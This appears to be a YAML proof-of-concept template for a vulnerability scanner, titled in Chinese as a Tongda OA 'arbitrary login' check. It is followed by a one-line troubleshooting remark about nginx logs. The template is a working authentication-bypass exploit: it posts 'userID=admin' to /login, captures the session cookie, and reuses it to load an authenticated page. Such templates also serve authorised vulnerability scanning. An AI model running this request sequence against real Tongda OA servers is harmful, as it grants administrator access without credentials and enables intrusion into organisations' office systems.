name: 通达OA任意登录
manual: true
sets:
rules:
  - method: POST
    path: /login
    headers:
      Content-Type: text/xml; charset=UTF-8
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
    body: "userID=admin"
    follow_redirects: false
    continue: true
    search: |
      Set-Cookie:(?P<cookie>.*?)
  - method: GET
    path: /theme/concise
    continue: true
    headers:
      Cookie: "{{cookie}}"
    expression: |
      response.body.bcontains(b"originalAlert")

For rule two, I checked my local nginx logs and no request was sent to /theme/concise.